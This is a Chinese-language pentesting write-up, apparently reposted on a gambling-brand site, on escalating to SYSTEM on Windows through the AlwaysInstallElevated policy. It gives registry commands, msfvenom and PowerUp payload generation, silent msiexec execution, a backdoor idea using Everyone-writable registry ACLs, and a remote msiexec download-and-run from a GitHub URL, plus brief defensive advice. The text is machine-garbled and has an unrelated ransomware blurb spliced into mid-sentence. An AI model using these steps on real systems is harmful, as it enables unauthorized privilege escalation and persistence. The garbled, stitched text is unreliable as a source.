应用AlwaysInstallElevated提权的测试剖析 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

应用AlwaysInstallElevated提权的测试剖析

申博_安全防护 申博 78次浏览 未收录 0个评论

0x00 媒介

应用AlwaysInstallElevated提权是一个2017年公然的手艺,Metasploit和PowerUp都供应了应用要领。

我在研讨的历程当中,发明Metasploit的应用要领存在一些不足,我碰到了和其他公然文章形貌不一样的状况。

因而我做了进一步的研讨,本文将要引见我碰到的题目和解决要领。

0x01 简介

本文将要引见以下内容:

· 通例应用要领

· 我在测试中碰到的题目

· 解决要领

· 扩大应用思绪

0x02 通例应用要领

AlwaysInstallElevated是一个组策略设置,假如启用,那末将许可普通用户以SYSTEM权限运转装置文件(msi)。

启用要领:

须要修正以下两个组策略:

· Computer Configuration\Administrative Templates\Windows Components\Windows Installer

· User Configuration\Administrative Templates\Windows Components\Windows Installer

设置成Enabled,以下图:

应用AlwaysInstallElevated提权的测试剖析

注:没法经由历程secedit.exe在敕令行下修正以上两个组策略。

敕令行下的启用要领:

建立以下两个注册表项:

· HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer,AlwaysInstallElevated,1

· HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer,AlwaysInstallElevated,1

cmd的敕令以下:

reg add HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

应用要领:

启用AlwaysInstallElevated后,可以经由历程敕令行挪用msiexec装置msi文件,msi文件内包括要实行的Payload,Payload将会以System权限实行。

挪用msiexec的敕令以下:

msiexec /q /i test.msi

/i参数用来示意装置操纵。

/q参数用来隐蔽装置界面。

注:实行后会在%TEMP%下天生MSI的log文件。

更多关于msiexec的引见可参考之前的文章《渗入测试中的msiexec》。

0x03 开源要领测试

在测试环境启用AlwaysInstallElevated,敕令以下:

reg add HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

1.PowerUp

https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

(1)测试是不是启用AlwaysInstallElevated

Import-Module .\PowerUp.ps1
Get-RegistryAlwaysInstallElevated

返回True代表开启。

(2)导出msi文件

Import-Module .\PowerUp.ps1
Write-UserAddMSI

当前目次天生UserAdd.msi。

(3)敕令行实行(当前用户权限)

msiexec /q /i UserAdd.msi

弹出增加用户的对话框,可以用来增加用户,以下图:

应用AlwaysInstallElevated提权的测试剖析

此时检察该对话框的权限为System,以下图:

应用AlwaysInstallElevated提权的测试剖析

提权胜利。

2.Metasploit

天生弹出计算器的msi文件,敕令以下:

msfvenom -p windows/exec CMD=calc.exe -f msi >calc.msi

敕令行实行msi文件(当前用户权限):

msiexec /q /i calc.msi

弹出的计算器权限为Medium,以下图:

应用AlwaysInstallElevated提权的测试剖析

这与PowerUp的效果差别。

换成其他Payload的msi文件,比方增加用户:

msfvenom -p windows/adduser USER=test [email protected] -f msi >adduser.msi

比方实行cmd敕令:

msfvenom -p windows/x64/exec CMD='whoami >1.txt' -f msi > cmd.msi

因为权限不够(为Medium),均失利。

这与其他公然文章引见的状况不一样。

个人猜想:

记一次与QNAPCrypt勒索软件背后黑手的攻防战

介绍 针对Linux操作系统的勒索软件在过去并不常见,不过现今网络犯罪分子们似乎有开始往这方向发展的趋势,且试图通过各种方法在这一领域中牟取利润。 近日,Intezer检测到了一起针对基于Linux文件存储系统(NAS服务器)的勒索软件行动,其目标是感染并加密文件以勒索赎金。Intezer将此勒索软件命名为QNAPCrypt(作者标记恶意软件的名称),QNAP是一家知名的NAS服务器品牌供应商。NAS服务器通常存储大量重要数据和文件,这也使得它们成为了攻击者眼中的一块肥肉。 目前,QNAPCrypt在所有主要的安全解

运用Metasploit天生的msi文件在运转时没有请求提拔权限,所以致使了这个题目。

0x04 解决要领

这里可以参考PowerUp的体式格局天生msi文件。

直接实行PowerUp天生的UserAdd.msi,以下图:

应用AlwaysInstallElevated提权的测试剖析

提醒msi文件是由MSI Wrapper天生。

下面我们就尝试运用MSI Wrapper天生一个可用的Payload。

下载地点:

Free Download

天生历程以下:

1.将Payload设置为实行ProcessHacker

设置以下图:

应用AlwaysInstallElevated提权的测试剖析

2.运转时请求提拔权限

设置以下图:

应用AlwaysInstallElevated提权的测试剖析

注:MSI installation context下挑选Per User和Per Machine都可以。

其他设置根据默认设置,天生的msi文件已上传至github,地点以下:

https://github.com/3gstudent/test/blob/master/RunProcessHacker.msi

再次测试,敕令行实行msi文件(当前用户权限):

msiexec /q /i RunProcessHacker.msi

ProcessHacker以System权限实行,应用胜利,以下图:

应用AlwaysInstallElevated提权的测试剖析

综合以上的测试,我们可以得出结论:

运用Metasploit天生的msi文件在运转时没有请求提拔权限,所以没法应用AlwaysInstallElevated提权。

我们可以运用MSI Wrapper天生可供应用的msi文件。

0x05 扩大应用思绪

通常状况下,先对注册表项举行推断,假如满足前提(存在两个注册表项),就可以应用AlwaysInstallElevated提权。

扩大思绪1:

假如取得了Backup service用户的权限,输入whoami /priv后,发明存在以下权限:

· SeRestorePrivilege

· SeTakeOwnershipPrivilege

此时可以对注册表举行写操纵,可以建立对应的注册表项,再应用AlwaysInstallElevated提权

应用SeRestorePrivilege和SeTakeOwnershipPrivilege写注册表可参考之前的文章:《渗入技能——Windows Token九种权限的应用》

扩大思绪2:

假如已取得体系权限,可以建立一个提权后门。

对以下注册表项增加ACL,许可Everyone举行写操纵:

· HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer

· HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

对注册表项增加ACL的要领可参考之前的文章:《渗入技能——Windows下的Access Control List》

扩大思绪3:

msiexec支撑长途下载实行,那末可否应用AlwaysInstallElevated提权?

测试敕令以下:

msiexec /q /i https://raw.githubusercontent.com/3gstudent/test/master/RunProcessHacker.msi

实行失利。

下面查找缘由,显现装置历程,测试敕令以下:

msiexec /i https://raw.githubusercontent.com/3gstudent/test/master/RunProcessHacker.msi

提醒泉源不可托,以下图:

应用AlwaysInstallElevated提权的测试剖析

得出结论:

msi文件须要可托的证书才长途应用AlwaysInstallElevated提权。

0x06 防备发起

假如没有特别需求,禁用AlwaysInstallElevated。

监控注册表项:

· HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer

· HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

0x07 小结

本文引见了应用AlwaysInstallElevated提权的要领,找到了运用Metasploit天生的msi文件应用失利的缘由,末了引见了怎样经由历程MSI Wrapper天生可供应用的msi文件。

原文地点: https://www.4hou.com/technology/19286.html


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明应用AlwaysInstallElevated提权的测试剖析
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址